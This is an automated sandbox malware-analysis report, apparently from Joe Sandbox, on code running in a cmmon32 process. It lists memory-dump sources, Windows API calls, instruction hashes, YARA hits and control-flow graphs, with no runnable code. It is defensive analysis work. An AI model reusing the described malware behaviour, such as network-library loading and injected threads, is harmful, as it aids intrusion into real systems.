                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                  • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                  • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 4d6ceb3d0b47a98cae89a706c37301fbaf0125d21619eb67ec4c24b9baa23de9
                                                                                                  • Instruction ID: 8e9e6080a58383095d2c871ba99339b8337ce188a5bf49900125261b0df84114
                                                                                                  • Opcode Fuzzy Hash: 4d6ceb3d0b47a98cae89a706c37301fbaf0125d21619eb67ec4c24b9baa23de9
                                                                                                  • Instruction Fuzzy Hash: 4C90023520148802F918715C880474A0005CBD1315F59E411A5425658D8795D9A17121
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 47b4bd9afa2a4b6d5236288f118cf8a449c329b72040a0b93fc020f13a75cb2c
                                                                                                  • Instruction ID: fb94ac27d64046193db892d4e2aeeb816a4f5eaa69af6ffa3e76fb36bbfe2402
                                                                                                  • Opcode Fuzzy Hash: 47b4bd9afa2a4b6d5236288f118cf8a449c329b72040a0b93fc020f13a75cb2c
                                                                                                  • Instruction Fuzzy Hash: DD90023520140842F908715C4804B460005CBE1315F55E016A1125654D8715D9617521
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: be7cc515923079eace1a7cb4446c0ea002e20c4ddb329a397a95f46d95026164
                                                                                                  • Instruction ID: 3821b428a0aa569f08abfa2458310f87253af5cd4b7cb73d86ac35a2ab2adb9b
                                                                                                  • Opcode Fuzzy Hash: be7cc515923079eace1a7cb4446c0ea002e20c4ddb329a397a95f46d95026164
                                                                                                  • Instruction Fuzzy Hash: 9990023520140402F908759C58086460005CBE1315F55F011A6025555EC765D9A16131
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d40a23c19032a08bc6b5c1ffa6da2b5df03da5009f37209a6a48dee984a9952c
                                                                                                  • Instruction ID: 8dbe946ebad38a397812811030914b8186702741b06a62bc3987cc0c15329ac7
                                                                                                  • Opcode Fuzzy Hash: d40a23c19032a08bc6b5c1ffa6da2b5df03da5009f37209a6a48dee984a9952c
                                                                                                  • Instruction Fuzzy Hash: 5090022D21340002F988715C580860A0005CBD2216F95F415A1016558CCB15D9795321
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6e04f899051a5bdf46acfa8df5a7628e6fa41f84ab5e96e9b3457e23c316462f
                                                                                                  • Instruction ID: 2fcade0ede2aaaa142dafd4f142acea0c17dec7fa2e65e940c44dab07af6e108
                                                                                                  • Opcode Fuzzy Hash: 6e04f899051a5bdf46acfa8df5a7628e6fa41f84ab5e96e9b3457e23c316462f
                                                                                                  • Instruction Fuzzy Hash: AC90023520140413F919715C49047070009CBD1255F95E412A1425558D9756DA62A121
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3200947a8ce4178cbabef7b0f6a63ef51e0be2e9707cbff13b7dc675a8ebbc6f
                                                                                                  • Instruction ID: 3f26849af57003a67b9cc33dc2687fa02ee3f90e7e7b9750dd84f8c817f6ec98
                                                                                                  • Opcode Fuzzy Hash: 3200947a8ce4178cbabef7b0f6a63ef51e0be2e9707cbff13b7dc675a8ebbc6f
                                                                                                  • Instruction Fuzzy Hash: 70900225242441527D4DB15C48045074006DBE1255795E012A2415950C8726E966D621
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: b1ec388824109689785e91770f5afe8e23edc4a6b753aaa1d69c576c62630564
                                                                                                  • Instruction ID: 158bd9398d005c37daa11549122183ab8718af087e218da4caaa6957ef15483c
                                                                                                  • Opcode Fuzzy Hash: b1ec388824109689785e91770f5afe8e23edc4a6b753aaa1d69c576c62630564
                                                                                                  • Instruction Fuzzy Hash: 4390027520140402F948715C48047460005CBD1315F55E011A6065554E8759DEE56665
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 82413d80945c8127d04834b94813c8840f73515149a7b1f3247af3c34e605f9f
                                                                                                  • Instruction ID: ac77ab5b48e885efca9a9e429f9cbaa39a4bd1388da2bdb17e3932cc1981823c
                                                                                                  • Opcode Fuzzy Hash: 82413d80945c8127d04834b94813c8840f73515149a7b1f3247af3c34e605f9f
                                                                                                  • Instruction Fuzzy Hash: F490026534140442F908715C4814B060005CBE2315F55E015E2065554D8719DD626126
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: ddd942ce001c6034c639c20a31c5e31f85be7e0e41cdd438799e4696a41e006b
                                                                                                  • Instruction ID: 62d5338ceee8f816a68f3c9a32009270085ded0a00ccfeecb642437f96972a2c
                                                                                                  • Opcode Fuzzy Hash: ddd942ce001c6034c639c20a31c5e31f85be7e0e41cdd438799e4696a41e006b
                                                                                                  • Instruction Fuzzy Hash: 6B900225211C0042FA08756C4C14B070005CBD1317F55E115A1155554CCB15D9715521
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: de0c59cc4e95c29c81935bd7e226f728ae4c1e7564d939614527ce78a03e3d7b
                                                                                                  • Instruction ID: 4fbc84f461fe0cd8774377e459ae0246e0a9cc98a75468f5637b74a3e6fd61b8
                                                                                                  • Opcode Fuzzy Hash: de0c59cc4e95c29c81935bd7e226f728ae4c1e7564d939614527ce78a03e3d7b
                                                                                                  • Instruction Fuzzy Hash: 5790022921140003290DB55C0B045070046CBD6365355E021F2016550CD721D9715121
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 14631393684bb1578b12ebb31e9afaea4968b811e58da032a1a1c27713870e16
                                                                                                  • Instruction ID: 501d0e122fc40d371b8d35457216320ca8dc71760bf7d5d6e3d9d564146415c6
                                                                                                  • Opcode Fuzzy Hash: 14631393684bb1578b12ebb31e9afaea4968b811e58da032a1a1c27713870e16
                                                                                                  • Instruction Fuzzy Hash: CF90026520240003690D715C4814616400ACBE1215B55E021E2015590DC725D9A16125
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 02fa6a7cd52c4163b18004b98c4d60e33259b178466d2a8d23239deca6e640d5
                                                                                                  • Instruction ID: 64b9941173a1f29dfac6502209d8493c97b36dc2bb0e3ee97210651669702dcd
                                                                                                  • Opcode Fuzzy Hash: 02fa6a7cd52c4163b18004b98c4d60e33259b178466d2a8d23239deca6e640d5
                                                                                                  • Instruction Fuzzy Hash: 8990023520140802F988715C480464A0005CBD2315F95E015A1026654DCB15DB6977A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 84445f413b58bb6f31d55df712a1d15c6d76716163f40f03f9c31588d96f875e
                                                                                                  • Instruction ID: bab02f8b560575b4cc2726c050509cbaf5a3208310aa1e5d66205b9e97fb9d09
                                                                                                  • Opcode Fuzzy Hash: 84445f413b58bb6f31d55df712a1d15c6d76716163f40f03f9c31588d96f875e
                                                                                                  • Instruction Fuzzy Hash: 5490023520544842F948715C4804A460015CBD1319F55E011A1065694D9725DE65B661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a7423c609c4f4664473a48d081831bf736836532d2da2f6feb1121799f0ec379
                                                                                                  • Instruction ID: 61accfcc68a508d25d5e87d88ffd716e3083d99975ac0ba0073c5a59c8aff4e5
                                                                                                  • Opcode Fuzzy Hash: a7423c609c4f4664473a48d081831bf736836532d2da2f6feb1121799f0ec379
                                                                                                  • Instruction Fuzzy Hash: 3B90023560550402F908715C49147061005CBD1215F65E411A1425568D8795DA6165A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 364 419080-4190c2 call 41bd40 368 4190c8-419118 call 41be10 call 40acf0 call 414e50 364->368 369 41919c-4191a2 364->369 376 419120-419131 Sleep 368->376 377 419133-419139 376->377 378 419196-41919a 376->378 379 419163-419183 377->379 380 41913b-419161 call 418ca0 377->380 378->369 378->376 382 419189-41918c 379->382 383 419184 call 418eb0 379->383 380->382 382->378 383->382
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00419128
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  • Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                                                                                  • Instruction ID: 2511d3cdde594a459876a10949f18b9dbd63c8e6bbb0d03ebfda35d58ccafa52
                                                                                                  • Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
                                                                                                  • Instruction Fuzzy Hash: 243192B2500345BBD724DF65C885FA7B7B9FB48B04F10811EF62E5B245D634B990CBA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 385 419076-419079 386 419086-4190c2 call 41bd40 385->386 387 41907b-419083 385->387 390 4190c8-419118 call 41be10 call 40acf0 call 414e50 386->390 391 41919c-4191a2 386->391 387->386 398 419120-419131 Sleep 390->398 399 419133-419139 398->399 400 419196-41919a 398->400 401 419163-419183 399->401 402 41913b-419161 call 418ca0 399->402 400->391 400->398 404 419189-41918c 401->404 405 419184 call 418eb0 401->405 402->404 404->400 405->404
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00419128
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  • Opcode ID: 83c94312b025ac2bb7b086efcd4bd73689efb029c8943fe09f56330635d0dd12
                                                                                                  • Instruction ID: 9f7f4ee09f666ca45351ad7ce532febd614e12d69ab19ad51d6f4e62b28ca626
                                                                                                  • Opcode Fuzzy Hash: 83c94312b025ac2bb7b086efcd4bd73689efb029c8943fe09f56330635d0dd12
                                                                                                  • Instruction Fuzzy Hash: 063193B1900305BBD714DF65C885FA7B7B4FB48704F10801EFA296B245D778A990CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 419 41a662-41a687 call 41af60 421 41a68c-41a6a1 RtlFreeHeap 419->421
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                  • Opcode ID: 476827b4cf0adb22f134cf2721237f9fb703a983405e57083bed56f01b049a5c
                                                                                                  • Instruction ID: e880f57384980f89cf93d6b95c6378fdede24d9d2de261eb18b1810246b2b0e1
                                                                                                  • Opcode Fuzzy Hash: 476827b4cf0adb22f134cf2721237f9fb703a983405e57083bed56f01b049a5c
                                                                                                  • Instruction Fuzzy Hash: A5E022B41003415BEB10FF65D4C04D737A8BF84314F10852EE84D87206C231E066CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 422 41a670-41a686 423 41a68c-41a6a1 RtlFreeHeap 422->423 424 41a687 call 41af60 422->424 424->423
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                  • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                  • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 416 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00000000,?), ref: 0041A65D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID: 6EA
                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                  • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                  • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 428 408395-40839d 430 408369-40836e PostThreadMessageW 428->430 431 40839f-4083f8 call 41be60 call 408310 call 41b750 428->431 433 408370-40838b call 40a480 PostThreadMessageW 430->433 434 40838d-408392 430->434 443 408400-408432 call 40f670 call 41a500 431->443 433->434 448 408434-40843c 443->448 449 408467-40846f 443->449 450 408456-408460 448->450 451 40843e-408445 448->451 450->443 453 408462-408465 450->453 451->450 452 408447-40844e 451->452 452->450 454 408450-408454 452->454 455 40848d-40849f call 41a490 453->455 454->450 456 408470-40848a call 41bde0 454->456 455->449 460 4084a1-40850c call 419d10 455->460 456->455 460->449 464 408512-40856e call 419d50 460->464 464->449 467 408574-4085c1 call 41b3f0 call 41b410 call 41c0d0 call 41bde0 call 414a50 464->467
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: 46bbe230f166738d70dd1b3e221cb68f3ab9afd02103c3f12cb840c2e172bee4
                                                                                                  • Instruction ID: 513b1df9b156dd44eedd2723c508216830ef1d1bf6efc3dd4786fb69eb0b4070
                                                                                                  • Opcode Fuzzy Hash: 46bbe230f166738d70dd1b3e221cb68f3ab9afd02103c3f12cb840c2e172bee4
                                                                                                  • Instruction Fuzzy Hash: 4F51B2B09003099FDB14DF65D985BEB77B8EB48308F10056EF849A7281EB74A945CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
